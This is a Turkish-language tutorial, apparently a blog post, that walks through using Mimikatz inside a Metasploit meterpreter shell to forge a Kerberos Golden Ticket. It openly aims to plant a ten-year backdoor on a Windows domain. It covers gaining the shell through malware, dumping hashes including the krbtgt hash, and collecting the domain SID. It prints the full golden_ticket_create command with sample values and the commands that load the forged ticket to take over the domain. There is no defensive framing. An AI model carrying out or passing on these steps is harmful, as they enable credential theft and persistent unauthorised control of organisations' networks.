Mimikatz C dili ile yazılmış, hackerin Windows(x32/x64)
sistemlerde oturum bilgisi toplama
aracıdır. Mimikatz aracı ile bilgisayarda;
- Kullanıcılara ayrıcalık izni verilebilir, ayrıcalıklar kaldırılabilir, ayrıcalıklar engellenebilir.
- Bazı Group politika ayarları atlatılabilir.
- Güvenlik ve loglama servisleri engellenebilir.
- DLL eklenebilir.
- Windows parolası (Hash değeri) elde edilebilir.
Bu makalede Windows parola(hash değeri) elde edeceğiz. Elde edilen parola ile giriş yapacak bir arka kapı oluşturulacak. Oluşturulan bilet(Golden Ticket) ile istenildiği zaman sisteme oturum açılabilecektir. Biletle oluşturulan kullanıcı ve parola değiştirilene kadar bu sisteme giriş yapabileceğiz.
Mimikatz ayrı bir tool olduğu gibi
meterpreter içersine de dahil edilmiştir. Burada yapılan işlemleri ayrı bir
tool olan mimikatz aracı ile de yapabilirsiniz. Biz burada meterpreter ile
işlemleri gerçekleştireceğiz.
Kerberos ile doğrulama yapılması sonucu
kerberos bileti alınır. Bu bilet varsayılan olarak 10 saat geçerlidir ve 7 gün boyunca otomatik olarak güncellenir. Bu
bileti aldıktan sonra sürekliliği sağlamak için yeni bir bilet(Golden Ticket) oluşturulur.
Biletin geçerliliğini 10 yıl yapabiliriz.
Metaspolit'den yararlanarak bir zararlı
yazılım oluşturulur veya sistemin zaafiyetlerinden yararlanarak meterpreter
kabuğu ile erişim sağlanabilir. Biz burada zararlı yazılım ile meterpreter
kabuğu oluşturduk.
Şimdi meterpreter açtıktan sonra mimikatz
aracını başlatalım.
"help" komutunu çalıştıralım. golden_ticket_create komutunun yüklendiğini göreceğiz.
"golden_ticket_create" yazdığımızda kullanım özelliği;
Bize gerekli olacak veriler;
- Domain ismi
- Domain SID değeri
- krbtgt hesabının NT hash değeri
- Kullanıcı adı
Bu bilgileri toplamak için meterpreter
kabuğundan yararlanabiliriz."shell" yaptıktan sonra:
wmic useraccount get sid,
name
Bu çıktı sonucu sid değeri “S-1-5-21-3858730332-1011697992-2744319919″.
Şimdi Domain ismini elde edelim.
ipconfig /all
Domain isminin "watch.com" olduğunu gördük.
Şimdi de krbtgt hash değerini bulalım.
Yine meterpreter kabuğunu kullanacağız.
hashdump veya run
post/windows/gather/hashdump
İşlem 32 bit ve işletim sistemi 64 bit olduğu
için, Meterpreter “hashdump” komutunun mevcut durumda çalışmayabilir. Bunun
için, 64 bitlik SYSTEM yetkileri ile çalışan bir işleme geçilmesi gerekmektedir. Bu şekilde "hashdump"
Gerekli bilgileri topladıktan sonra yeni bir
bilet (Golden Ticket) oluşturabiliriz. Bu biletin geçerliliği 10 yıl olarak
belirleyeceğiz.
Mimikatz yüklü olan meterpreter'a aşağıdaki
kodları yerleştiririz.
golden_ticket_create -d watch.com -g 500, 502, 512 -k d15a9386dd348bc711045124a4f647c0
-s S-1-5-21-3858730332-1011697992-2744319919 -u GoldenTicket -t
/root/GoldenNewUserİnfo.krbtgt
Bu oluşturulan yeni oturumla başka bir
kullanıcıya bağlı kalmadan 10 yıl boyunca sistemden yararlanılabilir. Bu
kullanıcı silinirse veya şifresi değiştirilirse NT hash değeri değişeceğinden
sisteme giriş yapılamayacaktır.
Var olan kullanıcıları listeleyelim.
kerberos_ticket_list
kerberos_ticket_purge
kerberos_ticket_purge
Şimdi de kaydettiğimiz bilet bilgilerini
kullanarak var olan kullanıcıları listeleyelim.
kerberos_ticket_use /root/GoldenNewUserİnfo.krbtgt
kerberos_ticket_list
kerberos_ticket_list
Sisteme başarılı bir şekilde giriş yaptık. Görüldüğü gibi
biletin kullanılma süresi 10 yıl olarak görülmektedir. Bundan sonra kullanıcı
eklenebilir, silinebilir. Erişilemeyen ağlara erişilebilir.
